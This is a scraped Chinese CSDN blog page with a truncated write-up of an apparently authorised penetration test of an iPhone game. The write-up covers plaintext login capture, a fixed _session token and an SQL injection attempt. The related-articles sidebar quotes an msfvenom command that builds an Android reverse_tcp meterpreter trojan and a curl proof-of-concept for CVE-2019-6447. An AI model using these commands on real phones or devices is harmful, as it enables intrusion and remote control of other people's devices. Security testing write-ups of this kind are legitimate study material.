软件测试最全实战 记一次对iphone手机游戏的渗透测试_ios渗透,2024年最新组件化与插件化的差别在哪里

最新推荐文章于 2024-06-20 11:51:49 发布
最新推荐文章于 2024-06-20 11:51:49 发布
阅读量816 收藏 14
点赞数 19
分类专栏: 程序员 文章标签: 单元测试 功能测试 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84731999/article/details/138782704
版权

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

各位师傅好,我是女鬼水妖,某高校大二学生,热爱网络安全,主攻红队方向。第一次投稿,也是第一次进行实战演练。如果有写的不好的地方,请师傅们指出,谢谢大家!

测试目的

关于网络上对于移动游戏渗透的文章,都比较少。再加上我本来是比较喜欢打游戏的,经过某公司渗透授权,对此游戏进行渗透测试。

测试流程

其实移动游戏渗透和网站渗透的基本流程都是一样的。我们现在所需要的联网程序都是通过网络对服务器进行数据交互。和游戏公司商讨后就不上传游戏页面了,大家跟着思路来就行。

0x01:搭建好环境

本人设备如下

移动端:IPHONE XR(未越狱)

PC端:Windows10 + Kali Linux

需要软件:Burpsuite + Sqlmap

image-20220706170545113

image-20220706171113407

image-20220706171450081

image-20220706171534302

0x02 Burp抓包

先进行登录,发现它居然是用明文传输,没有经过其他加密算法进行加密。

WeChat Image_20220706171810

这是登录后、选择服务器后、一连串的操作,我们把目光放在最后一个POST操作上

WeChat Screenshot_20220706173354

我们可以发现通过这个POST请求,可以获得角色信息

而且 _session 和刚刚登录的账号密码没有太大的联系

账号密码就是为了获取 _session,同时 _session 是固定不变的 所以就可以说这个 _session 可以绕过来进行水平越权、同时还可以利用这个 _session 参数进行流量攻击

经过测试,无论我们访问那个页面,都是需要 _session 这个参数来进行访问

也就是说,_session 就是一个很大的突破口

思路
    1. 试想是否能够修改其他 _session 来进行登录其他账号呢?(水平越权)【经过测试以前确实可以、现在在后端增加了验证之后就不可以了】
    1. _session 是与数据库进行关联的,那是否存在注入的可能呢?(更深层次的信息收集处理)

0x03 思路2

我们的目的不是登录其他用户的账号,我们是看是否能直接进行对数据库进行读取。

WeChat Image_20220706180436

我们尝试 用单引号进行注入

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84731999
关注
  • 19
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android和iOS逆向分析/安全检测/渗透测试框架
哆啦安全
06-08 1311
一、移动应用安全测试环境 二、移动安全框架 三、安卓应用渗透测试(逆向工程和静态分析) 四、动态和运行时分析 五、网络分析和服务器端测试 六、Android绕过根检测和SSL固定 七、安全库 八、iOS应用渗透测试(访问iDevice上的文件系统) 九、逆向工程和静态分析 十、动态和运行时分析 十一、网络分析和服务器端测试 十二、iOS绕过根检测和SSL固定 十三、安全库......
实战 | 一次iphone手机游戏渗透测试
leah126的博客
02-10 1589
各位师傅好,我是女鬼水妖,某高校大二学生,热爱网络安全,主攻红队方向。账号密码就是为了获取 _session,同时 _session 是固定不变的 所以就可以说这个 _session 可以绕过来进行。再加上我本来是比较喜欢打游戏的,经过某公司渗透授权,对此游戏进行渗透测试。1. 移动端游戏是比较少进行渗透,我相信漏洞也是很多的,师傅们可以自己去挖掘。我们的目的不是登录其他用户的账号,我们是看是否能直接进行对数据库进行读取。先进行登录,发现它居然是用明文传输,没有经过其他加密算法进行加密。
漏洞复现
axuhongbo的博客
11-20 1424
本文为的安卓漏洞 CVE-2019-6447 复现 用到的apk下载链接: APK下载链接 kali 虚拟机 curl --header "Content-Type: application/json" --request POST --data "{\"command\":getDeviceInfo}" http://192.168.43.251:59777 -vvv 参考链接 POC 参考链接1 参考链接2 ...
【建议收藏】Android和iOS逆向分析/安全测试/渗透测试工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
06-20 935
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…2.Needle是一个开源的模块框架,用于简iOS应用程序进行安全评估的过程,包括二进制分析、静态代码分析、使用Cycript和Frida挂钩的运行时操作等。5.Frida工具包使用客户端-服务器模型工作,让您不仅可以在Android上注入正在运行的进程,还可以在iOS、Windows和Mac上注入运行的进程。
APP测试 | 如何使用iPhone手机IOS端)抓包进行渗透测试
鱼溯的博客
01-02 3095
APP测试 | 如何使用iPhone手机IOS端)抓包进行渗透测试
渗透某德棋牌游戏
weixin_43639741的博客
05-20 1万+
声明 本文章纯属虚构,如有雷同不胜荣幸,文中一切观点,纯属于作者瞎想与作者本人无关,大牛误喷,不带节奏谢谢!愿互相帮助共同进步 一直找不到目标站点,昨天下午收到的一条微信之后突然有了目标 还是老规则 下载了APP 这里提示下注意事项 因为这种APP是自动采用微信账号登录 且苹果手机登录前需要申请数据网络权限 所以在进行抓包前 需要先点开APP给予数据网络权限并提前登录微信账号(设置代理之后无法...
金融类IOS APP端渗透测试实战分享
公众号【伤心的辣条】资料领取~
04-09 698
金融类APP的测试始终是一项挑战,尤其是在Android应用的防护策略日益完善,加壳和加固机制多样的背景下,这种情况更突显了iOS APP测试的重要性。本文将以作者对金融类iOS App的一次渗透测试实践为基础,分享一些iOS App安全测试的方法和经验。
一款儿童早教英语学习游戏ios源码.zip
06-16
"一款儿童早教英语学习游戏ios源码.zip" 这个标题指出,我们正在讨论的是一个专为儿童设计的英语学习应用程序的源代码,它以游戏的方式进行教学,适用于iOS操作系统。源码是软件开发的基础,包含程序设计的所有...
仿合金弹头ios游戏源码.zip
06-16
"游戏" 标签表明这是一个游戏应用程序,而 "软件/插件" 则暗示除了完整的游戏应用之外,源码可能还包含了可复用的库或模块,这些可以作为其他游戏开发的组件。 【压缩包子文件的文件名称列表】"仿合金弹头ios游戏...
让不懂编程的人爱上iPhone开发系列2 iOS12+Swift4.2版-Checklists-Cha011
08-03
在这个教程系列中,我们将探索如何使用iOS 12和Swift 4.2开发一款名为"Checklists"的事务管理应用。这个应用旨在帮助用户更好地组织和跟踪待办事项,通过提供一个简洁的界面来创建、编辑和管理任务列表。以下是这个...
IOS应用源码——一些iPhone开源项目代码iphonenes_src.rar
10-14
"IOS应用源码——一些iPhone开源项目代码iphonenes_src.rar"这个压缩包文件提供了一些iPhone的开源项目源码,这对于想要深入理解iOS应用开发的程序员来说是一份宝贵的资源。以下是基于这个主题的详细知识点讲解: 1...
ios APP 安全渗透测试(共46篇)
04-25
翻译自一位外国大牛的系列文章,共46篇,整理不易,内容详实,只提供给需要的人看。懂,请下载。
奥术:奥术是一个简单的脚本,旨在对iOS程序包(iphone-arm)进行后门操作,并为APT存储库创建必要的资源
02-05
这一工具对于理解iOS设备的安全性、渗透测试以及恶意软件分析具有重要的意义。 一、奥术脚本介绍 "奥术"是一个Shell脚本,其核心功能是对iOS应用进行后门植入。在黑客攻击或渗透测试的场景中,这种能力允许测试者...
探索 iOS 渗透测试:绝密工具清单
gitblog_00090的博客
05-27 267
探索 iOS 渗透测试:绝密工具清单 项目地址:https://gitcode.com/ivan-sincek/ios-penetration-testing-cheat-sheet 在这个数字时代,移动安全的重要性日益凸显。而iOS平台作为全球最受欢迎的移动操作系统之一,其安全检测与防护同样不容忽视。今天,我们向您推荐一个针对iOS设备进行渗透测试的专业开源项目——《iOS Penetratio...
如何讲清楚async和await?_,ajaxa,azqa,(1),2024最新细节决定成败
2401_83974020的博客
04-20 899
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔资料,这些笔详细载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。//那么这里就是在等待ajaxA请求的完成。//wait这个单词是等待的意思。
【建议收藏】Android和iOS逆向分析/安全测试/渗透测试工具
人生不怕起点低,就怕没追求
06-07 1016
一、移动应用安全测试环境 二、移动安全框架 三、安卓应用渗透测试(逆向工程和静态分析) 四、动态和运行时分析 五、网络分析和服务器端测试 六、Android绕过根检测和SSL固定
利用Kali入侵局域网的手机
热门推荐
LYKymy的博客
03-30 2万+
生成木马病毒(将生成的apk文件拷贝到手机) msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录) 启动postgresql数据库 service postgresql start 启动msfconsole msfconsole 使用探测句柄 use explo...
【2023最新版】渗透测试入门教程,手把手带你进阶渗透测试工程师,学完即可就业
BlueSocks152的博客
12-07 1882
看完这篇文章,你能学到渗透测试、kali渗透、2023最新渗透测试入门教程,手把手带你从零基础进阶渗透测试工程师。
阻击外挂——《龙之谷手游》安全测试的那点事
wetest_tencent的博客
04-11 2090
腾讯游戏内部的测试流程已经将“手游安全测试”设立为必经环节,腾讯大部分手游上线前都会进行手游安全测试,《王者荣耀》、《穿越火线:枪战王者》,《梦幻诛仙》等六星级游戏更是每一个版本都主动寻求手游漏洞扫描。《龙之谷手游》同样也是如此。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值